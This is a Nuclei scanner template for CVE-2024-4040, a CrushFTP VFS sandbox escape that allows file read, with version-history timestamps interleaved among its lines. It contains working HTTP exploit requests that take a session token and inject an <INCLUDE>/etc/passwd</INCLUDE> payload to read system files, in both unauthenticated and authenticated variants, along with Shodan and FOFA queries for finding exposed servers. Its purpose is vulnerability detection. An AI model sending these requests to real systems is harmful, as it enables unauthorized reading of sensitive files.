2024-04-23 11:49:51 +00:00
id : CVE-2024-4040
info :
2024-05-06 03:47:00 +00:00
name : CrushFTP VFS - Sandbox Escape LFR
2024-04-23 11:49:51 +00:00
author : DhiyaneshDK,pussycat0x
2024-05-06 03:47:00 +00:00
severity : critical
2024-04-23 11:49:51 +00:00
description : |
VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.
2024-05-06 03:47:00 +00:00
impact : |
Successful exploitation could lead to unauthorized access to sensitive data.
remediation : |
Apply the vendor-supplied patch or upgrade to the latest version to mitigate CVE-2024-4040.
2024-04-23 11:49:51 +00:00
reference :
- https://www.bleepingcomputer.com/news/security/crushftp-warns-users-to-patch-exploited-zero-day-immediately/
- https://www.crushftp.com/crush10wiki/Wiki.jsp?page=Update
- https://www.reddit.com/r/crowdstrike/comments/1c88788/situational_awareness_20240419_crushftp_virtual/
- https://www.reddit.com/r/cybersecurity/comments/1c850i2/all_versions_of_crush_ftp_are_vulnerable/
classification :
2024-05-06 03:47:00 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10
2024-04-23 11:49:51 +00:00
cve-id : CVE-2024-4040
2024-05-06 03:47:00 +00:00
cwe-id : CWE-94,CWE-1336
epss-score : 0.016
epss-percentile : 0.87316
cpe : cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
2024-04-23 11:49:51 +00:00
metadata :
verified : true
2024-06-07 10:04:29 +00:00
max-request : 5
2024-05-06 03:47:00 +00:00
vendor : crushftp
product : crushftp
2024-06-07 10:04:29 +00:00
shodan-query :
- "html:\"CrushFTP\""
- http.html:"crushftp"
fofa-query : "body=\"crushftp\""
2024-05-06 03:47:00 +00:00
tags : cve,cve2024,lfr,crushftp,vfs,kev
2024-05-05 10:00:19 +00:00
flow : |
if ( !template.hasOwnProperty('username') || !template.hasOwnProperty('password') ) {
// if username or password is not provided, run unauthenticated exploit
http("unauth-exploit")
} else {
// if username and password is provided, run login script and authenticated exploit
http("login") && http("auth-exploit")
}
2024-04-23 11:49:51 +00:00
http :
2024-05-05 10:00:19 +00:00
# unauthenticated exploit
- id : unauth-exploit
raw :
2024-04-23 11:49:51 +00:00
- |
GET /WebInterface/ HTTP/1.1
Host : {{Hostname}}
- |
2024-05-05 10:00:19 +00:00
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
2024-04-23 11:49:51 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
2024-05-05 10:00:19 +00:00
part : body_2
2024-04-23 11:49:51 +00:00
words :
2024-05-06 03:47:00 +00:00
- "root:x:"
2024-04-23 11:49:51 +00:00
- type : word
part : header
words :
- "text/xml"
extractors :
- type : regex
name : auth
internal : true
part : header_1
group : 1
regex :
- 'currentAuth=([0-9a-zA-Z]+)'
2024-05-05 10:00:19 +00:00
# login script
- id : login
raw :
- |
GET /WebInterface/ HTTP/1.1
Host : {{Hostname}}
- |
POST /WebInterface/function/ HTTP/1.1
Host : {{Hostname}}
Content-Length : 111
Origin : {{RootURL}}
Referer : http://{{RootURL}}/WebInterface/login.html
command=login&username={{username}}&password={{password}}&encoded=true&language=en&random=0.34712915617878926
stop-at-first-match : true
matchers-condition : and
matchers :
- type : word
part : body_2
internal : true
words :
- "<response>success</response>"
- type : word
part : header_2
internal : true
words :
- "text/xml"
extractors :
- type : regex
name : auth
internal : true
part : header_2
group : 1
regex :
- 'currentAuth=([0-9a-zA-Z]+)'
# authenticated exploit
- id : auth-exploit
raw :
- |
POST /WebInterface/function/?command=zip&c2f={{auth}}&path=<INCLUDE>/etc/passwd</INCLUDE>&names=/bbb HTTP/1.1
Host : {{Hostname}}
matchers :
- type : word
part : body
words :
2024-05-06 03:47:00 +00:00
- "root:x:"
2024-06-08 16:02:17 +00:00
# digest: 4a0a0047304502205948e827bf5269dd832ea8fc33d44f6117231bf9ad76ba8e2cb63850d4e41fb8022100dc3dd1a4a7e74dc17bfa8f30e8cf13605fbbc7bf05806d9aca6243bf03db95ac:922c64590222798bb761d5b6d8e72950
